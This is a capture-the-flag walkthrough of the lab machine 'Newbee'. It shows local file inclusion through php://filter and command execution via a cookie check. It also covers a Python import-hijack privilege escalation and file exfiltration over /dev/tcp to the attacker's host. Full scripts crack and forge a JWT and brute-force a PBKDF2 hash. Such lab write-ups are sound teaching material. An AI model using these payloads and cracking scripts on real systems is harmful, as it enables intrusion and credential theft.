
HMV-Newbee

HMV-Newbee box walkthrough

Port scanning

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.80.150
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 20:50 CST
Nmap scan report for bogon (192.168.80.150)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 56:99:F1:13:6A:38 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds

Only two common ports, so go straight to the web service.

Web enumeration

The site is a stock template with a lot of sub-pages, but they are all static: no useful information and nothing to interact with.

curl the home page directly, though, and there is an unusual hint at the very end of the response:

</html>
<!--Wrong paramter to GET-->

It wants a GET parameter, so fuzz for the parameter name (--hw 1267 hides responses with the baseline word count, so only a response that changes the page shows up):

┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -u http://192.168.80.150?FUZZ=id -w /usr/share/wordlists/wfuzz/general/common.txt --hw 1267
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.80.150?FUZZ=id/
Total requests: 951

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000384: 200 376 L 1270 W 18863 Ch "hack"

That gives the parameter name hack. curl again with it and the hint changes:

</html>
<!-- include failed try another file -->

So the parameter is passed to include. Trying the PHP wrappers does not get /etc/passwd out directly, so it looks like a specific file is expected. Brute-force the directory for candidates:

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.150 -x php,txt,jpg,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.80.150
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,jpg,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/about.php (Status: 200) [Size: 10036]
/products.php (Status: 200) [Size: 12163]
/blog.php (Status: 200) [Size: 9782]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 317] [--> http://192.168.80.150/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 321] [--> http://192.168.80.150/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]

The odd one out is secret.php.

It is a fake terminal, but it says admin permission is required. Back on the home page, use the include to read this file's source through php://filter (convert.base64-encode returns the file's bytes instead of executing them),
then base64-decode the blob to see the logic behind the secret page:

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.150/?hack=php://filter/read=convert.base64-encode/resource=secret.php

<?php

if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

if (isset($_GET['command'])) {
$command = $_GET['command'];
$output = shell_exec($command);
echo '<div>\> ' . htmlspecialchars($command) . '</div>';
echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
}
} else {
echo '<div>No permission to execute commands, lacking admin permission.</div>';
}
?>

The whole check is whether the cookie AreYouAdmin is present and equals Yes; if it is, the command parameter goes straight into shell_exec.
Replay the request in Burp with that cookie set and a reverse-shell command, and catch the shell.

Privilege escalation

www-data is allowed to run one Python script as the debian user through sudo. The script lives in the web root, which www-data can write to, and it imports random; Python searches the script's own directory before the standard library, so dropping a random.py next to it hijacks the import and hands over a shell as debian:

www-data@Newbee:/var/www/html$ echo "import os; os.system('/bin/bash')" > random.py
www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
sudo: unable to resolve host Newbee: Name or service not known
debian@Newbee:/var/www/html$

The debian user has no sudo rights. Look around the home directory instead:

debian@Newbee:~$ ls -al
total 60
drwx------ 5 debian debian 4096 Mar 25 06:24 .
drwxr-xr-x 4 root root 4096 Jul 11 2023 ..
-rw-r--r-- 1 root root 0 Mar 7 00:10 .bash_history
-rw-r--r-- 1 debian debian 220 Mar 7 00:10 .bash_logout
-rw-r--r-- 1 debian debian 3526 Jul 11 2023 .bashrc
drwx------ 3 debian debian 4096 Mar 6 21:40 .gnupg
-rw------- 1 debian debian 119 Mar 25 06:24 .mysql_history
-rw-r--r-- 1 debian debian 807 Jul 11 2023 .profile
drwxr-xr-x 2 root root 4096 Mar 25 08:02 .secret
drwxr-xr-x 2 debian debian 4096 Mar 8 23:01 .ssh
-rw------- 1 debian debian 9049 Mar 6 22:25 .viminfo
-rw-r--r-- 1 root root 151 Mar 6 21:25 config.php
-rw-r--r-- 1 root root 120 Mar 6 21:26 note.txt
-rw-r--r-- 1 debian debian 33 Mar 6 21:45 user.txt
debian@Newbee:~$ cat note.txt 
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me

The hint points at a database password.

debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls
hint.txt password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!

Inside .secret there is another hint: the zip password is the md5 of a key stored in MySQL.
Checking listening sockets shows a service on port 5000 bound to localhost only, which is why the nmap scan never saw it:

debian@Newbee:~/.secret$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

ps -ef shows what is behind it, and that it runs as root:

root 561 549 0 07:49 ? 00:00:00 /bin/sh -c /usr/bin/python3 /var/www/html/flask/main.py
root 565 561 0 07:49 ? 00:00:07 /usr/bin/python3 /var/www/html/flask/main.py

So it is a Flask app. Forward the port so it can be reached from the attacking machine and open it in a browser:

debian@Newbee:~/.secret$ socat TCP-LISTEN:9999,fork TCP4:127.0.0.1:5000 &
[1] 992


Note that this socat listener binds 0.0.0.0:9999, so anyone on the network can now reach the app; fine for a lab, not for a real engagement.
Any username and password logs in. Capturing the request in Burp shows a JWT, so crack its secret with john:

┌──(root㉿kakeru)-[~/tmp]
└─# echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InNkZmEiLCJleHAiOjE3NDMzNDQ5ODR9.ROPsqvA8LkCdvHB0NTE5vSC0tDiw91aaCAAU9n0E5-E" > hash

┌──(root㉿kakeru)-[~/tmp]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 ASIMD 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
noob (?)
1g 0:00:00:02 DONE 3/3 (2025-03-30 21:30) 0.4385g/s 3999Kp/s 3999Kc/s 3999KC/s tykya2..savolie1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The HS256 secret is noob.
Paste the token into an online JWT decoder to see its claims: the payload is {"username":"sdfa","exp":1743344984}, i.e. just the username from the login form plus an expiry.

Now re-sign the token with that key after changing username to admin.

The admin view shows the database password.
Back in the shell, query the database with it by entering these in turn:
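A self-contained version of the JWT attack, as an added example (not the author's code, and without the pyjwt library): crack the HS256 secret offline against a wordlist, decode the claims, then re-sign with username=admin. The token is the one captured above; the five-word wordlist standing in for john's password.lst is constructed.

```python
import base64
import hashlib
import hmac
import json
import time

# Token captured from the box (as quoted in this write-up); john recovered its secret as "noob".
CAPTURED_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                  "eyJ1c2VybmFtZSI6InNkZmEiLCJleHAiOjE3NDMzNDQ5ODR9."
                  "ROPsqvA8LkCdvHB0NTE5vSC0tDiw91aaCAAU9n0E5-E")
# Constructed mini wordlist standing in for /usr/share/john/password.lst.
WORDLIST = ["password", "admin", "secret", "letmein", "noob"]


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_claims(token: str) -> dict:
    """What an online JWT decoder shows: the payload, read without any signature check."""
    return json.loads(b64url_decode(token.split(".")[1]))


def sign_hs256(claims: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> bool:
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return False
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def crack_hs256(token: str, candidates):
    """Offline dictionary attack: the token is its own oracle, so no requests hit the server."""
    for word in candidates:
        if verify_hs256(token, word.encode()):
            return word
    return None


def forge(token: str, key: bytes, **changes) -> str:
    """Edit the captured claims and re-sign them with the recovered key (username=admin here)."""
    claims = decode_claims(token)
    claims.update(changes)
    claims["exp"] = int(time.time()) + 3600  # the captured exp has long passed
    return sign_hs256(claims, key)


if __name__ == "__main__":
    print("claims:", decode_claims(CAPTURED_TOKEN))
    key = crack_hs256(CAPTURED_TOKEN, WORDLIST)
    print("recovered key:", key)
    if key:
        admin = forge(CAPTURED_TOKEN, key.encode(), username="admin")
        print("forged:", admin, decode_claims(admin))
```

The verification step is the important part: a server that accepts a token signed with a four-letter dictionary word has effectively no authentication, since the attacker can produce a valid token for any username at will.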

mysql -u root -p
show databases;
use user;
show tables;
select * from user;

Result:

+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd | salt | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| 1 | debian | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.064 sec)

Then I had an AI write a script to brute-force the hash (the algo column "pbdf2$50500$60" gives the iteration count and the 60-byte output length; HMAC-SHA256 as the PRF is an assumption that turned out to be right):

import hashlib
import sys

# Target PBKDF2 parameters, taken from the user table
salt = bytes.fromhex("8bf3e3452b78544f8bee9400d6936d34")  # salt column, hex-encoded
hash_stored = bytes.fromhex("2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0")  # passwd column
iterations = 50500  # from "pbdf2$50500$60"
hash_length = 60    # derived-key length in bytes (120 hex chars)

# Read the wordlist and try every candidate
def dictionary_attack(wordlist="/Users/kakeru/tools/字典/password.lst"):
    with open(wordlist, "r", encoding="utf-8", errors="ignore") as f:
        for password in f:
            password = password.strip()
            # sha256 is assumed as the PRF; the algo string does not say
            hash_attempt = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=hash_length)

            if hash_attempt == hash_stored:
                print(f"[+] Found password: {password}")
                return password
            else:
                print(f"[-] No match: {password}")

    print("[-] No matching password found")
    return None

# Run the attack; an optional argument overrides the wordlist path
if __name__ == "__main__":
    dictionary_attack(*sys.argv[1:2])

That gives the password 1qaz2wsx. Take its md5 (echo -n, so the newline is not hashed) and try it on the zip:

debian@Newbee:~/.secret$ echo -n "1qaz2wsx" | md5sum
1c63129ae9db9c60c3e8aa94d3e00495 -
debian@Newbee:~/.secret$ unzip password.zip
Archive: password.zip
[password.zip] password.png password:
error: cannot create password.png
Permission denied

The password is accepted, but the extracted file cannot be created because .secret is owned by root. Copy password.zip to /tmp, unzip it there, and pull the resulting image out to the attacking machine.
Start the listener on the attacker side first, then push the file through /dev/tcp:

debian@Newbee:/tmp$ cat password.png  > /dev/tcp/192.168.80.11/1234 
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > a.png

The image is pixelated text, so search for pixelation (mosaic) recovery and find Depix:
https://github.com/spipm/Depixelization_poc

(base) kakeru@bogon Depixelization_poc-main % python3 depix.py \
-p /Users/kakeru/Downloads/a.png \
-s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png \
-o /Users/kakeru/Downloads/b.png

The output b.png still is not legible, but the input turns out to be the very sample mosaic shipped with that project, whose known plaintext gives the root password:

hellofromtheotherside

debian@Newbee:/tmp$ su - root
Password:
root@Newbee:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

  • Reading PHP source through php://filter wrappers
  • JWT attacks: cracking a weak HS256 secret and forging claims
  • Checking for localhost-only services with ss and exposing them with socat
  • A PBKDF2 dictionary-attack script
  • Pixelation (mosaic) recovery with Depix